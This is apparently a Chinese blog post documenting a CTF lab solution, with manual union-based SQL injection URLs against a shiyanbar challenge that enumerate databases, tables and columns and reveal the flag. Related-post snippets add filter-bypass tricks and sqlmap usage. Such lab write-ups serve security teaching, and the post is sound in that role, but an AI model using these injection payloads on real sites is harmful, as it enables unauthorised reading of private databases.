实验吧 sql注入

最新推荐文章于 2024-02-29 17:35:57 发布
最新推荐文章于 2024-02-29 17:35:57 发布
阅读量332 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 实验吧 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44481102/article/details/88769933
本文通过一个具体的实例演示了如何进行SQL注入攻击,从判断是否存在注入点开始,逐步查询出数据库名、表名及列名,并最终获取到了所需的数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:http://ctf5.shiyanbar.com/8/index.php?id=1 在这里插入图片描述

手动注入

  1. 判断是否存在sql注入
    ctf5.shiyanbar.com/8/index.php?id=1' 报错
    在这里插入图片描述
    ctf5.shiyanbar.com/8/index.php?id=1 and 1=1 正常打开
    在这里插入图片描述 ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 正常打开在这里插入图片描述
    存在sql注入

  2. 判断POC
    http://ctf5.shiyanbar.com/8/index.php?id=1 or 1=1
    在这里插入图片描述

  3. 查询字段数
    http://ctf5.shiyanbar.com/8/index.php?id=1 order by 1 正常显示在这里插入图片描述
    http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2 正常显示在这里插入图片描述 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3 报错在这里插入图片描述
    字段数为2

  4. 查询数据库
    union select schema_name form information_schema where 1 = 1
    http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,schema_name from information_schema.schemata limit 0,2 在这里插入图片描述
    查到数据库 my_db

  5. 查询数据表
    http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_schema,table_name from information_schema.tables
    在这里插入图片描述
    查到数据表 thiskey

  6. 查询表
    http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_name,column_name from information_schema.columns在这里插入图片描述
    查到表 k0y

  7. 读取值
    http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
    在这里插入图片描述

    读到值 whatiMyD91dump

SQL注入实验
xiongIT的博客
10-29 2995
SQL注入实验和站在防御者角度该怎么预防Sql注入
实验ctf
四盘山博客
07-25 3358
1/登陆一下好吗??http://ctf5.shiyanbar.com/web/wonderkun/web/index.html =' =' ctf{51d1bf8fb65a8c2406513ee8f52283e7} 2/who are you ? http://ctf5.shiyanbar.com/web/wonderkun/index.php import requests impor
实验吧——SQL注入 Write up(一)
Lemon's blog
08-05 585
前言:之前学习过了联合注入查询、布尔盲注、时间盲注等,这次就通过实验吧的SQL注入题来加强一下。 简单的sql注入 输入有回显,且有输入框,那就可以用联合查询的方法来注入 题中提示已经过滤了一些关键字,那么就先来查看题中过滤的是哪些关键字 ?id=1 union select order by # 回显结果: union,select等都被过滤而且没有报错说明#也被过滤 可以自己建立一个语句...
实验吧-简单的SQL注入
wyj_1216 House
04-07 434
题目来源: http://ctf5.shiyanbar.com/423/web/ writeup 1、进入页面后,尝试输入1 发现注入点 2、尝试注入 首先尝试 ?id=1' 其次,尝试 ?id=1 and 1=1 发现,没有and,且,空格被+替代 知识点:可用/**/,()来替代 进行尝试(这里用/**/来代替空格),再次尝试注入 3、尝试爆数据库 4、尝试爆表名 发现...
实验吧-简单的sql注入2 Writeup
baynk的博客
07-28 326
抓紧时间来搞,事情越来越多。。。 过程 输入1'后有报错,单引号闭合,尝试了--+和%23均无法注释,又试过了构造闭合,发现and和or也都用不了。加上这次只要被检测出来就直接就有提示界面,并不像上一个那样有信息可看,感觉挺麻烦的。 于是判断到底是如何被检测的,然后试过了双写,大小写啥的,都不行,于是我直接把所有的空格都去掉了,写成了1'and1='1,这次总算有提示了。 从上面就能看出来,如果...
实验吧-简单的注sql入 writeup
qq_24966613的博客
11-29 681
解题链接: http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值,通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入    2.1  python sqlmap.py  -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent  –tamper=space2comm
简单的sql注入之一 (实验吧)
wewww111的博客
08-11 3899
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
软件安全实验2 SQL注入实验
最新发布
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)...
sql注入漏洞和实验
2303_81447649的博客
02-29 1640
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注和布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。
人工智能实验SQL注入检测
01-15
在本实验“人工智能实验SQL注入检测”中,主要目标是构建一个分类器来识别和区分网络包中的正常访问和含有SQL注入攻击的情况。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意SQL代码,试图...
SQL注入攻击实验报告
05-07
### SQL注入攻击实验报告知识点详解 #### 一、实验背景及目的 - **实验背景**:随着互联网技术的发展,Web应用程序越来越广泛地应用于各种场景之中。然而,由于开发者对安全性的忽视,使得许多Web应用程序存在安全...
CTF实验吧——认真一点!
Iaired的博客
07-06 368
我的第一只小爬虫 爆数据库长度 import requests import re import string import threading import time s = requests.session() url = "http://ctf5.shiyanbar.com/web/earnest/index.php" str1 = "You are in" header = { ...
CTF-实验吧Once More
才不是小弱鸡的博客
05-10 1244
题目地址:http://www.shiyanbar.com/ctf/1805这是题目的提示,根据社会工程学的方法找到了ereg的漏洞(其实就是百度。。。)漏洞是ereg函数存在截断漏洞。这里表示输入的password必须是大小写字母和数字这句表示password长度要小于8且大小要大于9999999,这不是自我矛盾嘛嘤嘤嘤。其实这里可以用科学记数法传参,password=1e9就行啦~这句表示pa...
CTF 实验吧 Forms
The Road Of Sec
10-17 1145
1.直接看源码 f12   发现input 标签 hidden 2.   value的值为0 可以更改为1 点击enter  3.得到如图的代码 阅读可知 输入 -19827747736161128312837161661727773716166727272616149001823847 4. 得到flag
CTF-实验吧Writeup-Misc类(持续更新)
1cePeak
09-06 1935
  终于想起来更新实验吧STEGA的Writeup了(手动滑稽 1.欢迎来到地狱   解压欢迎来到地狱.zip,看到三个文件。      尝试打开地狱伊始.jpg文件,当然打不开,走不完的是出题人的套路~   图片无法正常显示。   丢进winhex看看,少了jpg文件头,我们将jpg文件头FF D8 FF E0 插入。     保存后即可正常打开图片。   有一个百度云的...
实验CTF-web
code_lab
02-27 6496
登陆一下好吗类型:sql注入已经过滤了/ # -- select or union |等,但是没有过滤单引号payload:username=pcat'='&password=pcat'='原sql语句为:select * from user where username='用户名' and password='密码'拼接后为:select * from user where username='p
CTF-实验吧-图片里的动漫
mynd天堂
03-03 3683
题目来源 www.shiyanbar/ctf/1914:点击打开链接 首先拿到题目看到是一张图片,没说的,下载下来。很显然,这应该设及到图片的隐写。这是一张JPG格式的图片,直接binwalk得到: 随机打开winhex,将图片拖进去,发现开头是FFD8。明显是jpg文件头开始标志啊,随机去寻找FFD9,即JPG文件结束标志,找到好几个,但有一个十分适合,因为其后面跟着的就是50
CTF-实验吧MISC-雌黄出其唇吻
The Road Of Sec
09-16 1024
1.解题链接 http://www.shiyanbar.com/ctf/1838 2.打开题目链接发现就是一串字符,并不能找到是哪一种编码,而且每次打开链接,会出现不同的字符   3.思路:注意到网址http://ctf5.shiyanbar.com/misc/10/,加个爬虫的文件试试 于是访问http://ctf5.shiyanbar.com/misc/10/robots.tx
CTF实验吧 凯撒变异
( :3 )
09-08 716
通过分析可以知道前四个“afZ_”四个的ASCII码值与“flag”的ASCII码值依次相差5,6,7,8。 #include <stdio.h> #include <string.h> int main () { char str[40]="afZ_r9VYfScOeO_UL^RWUc"; int i=0,j=5; while(i<s...
DVWA实验SQL注入入门指南
本资源是一份关于"常规漏洞利用-SQL注入实验指导书"的详细文档。它旨在帮助学习者理解和实践SQL注入这一关键的网络安全概念。实验分为几个步骤,首先,需要在DVWA(Damn Vulnerable Web Application)平台上进行操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值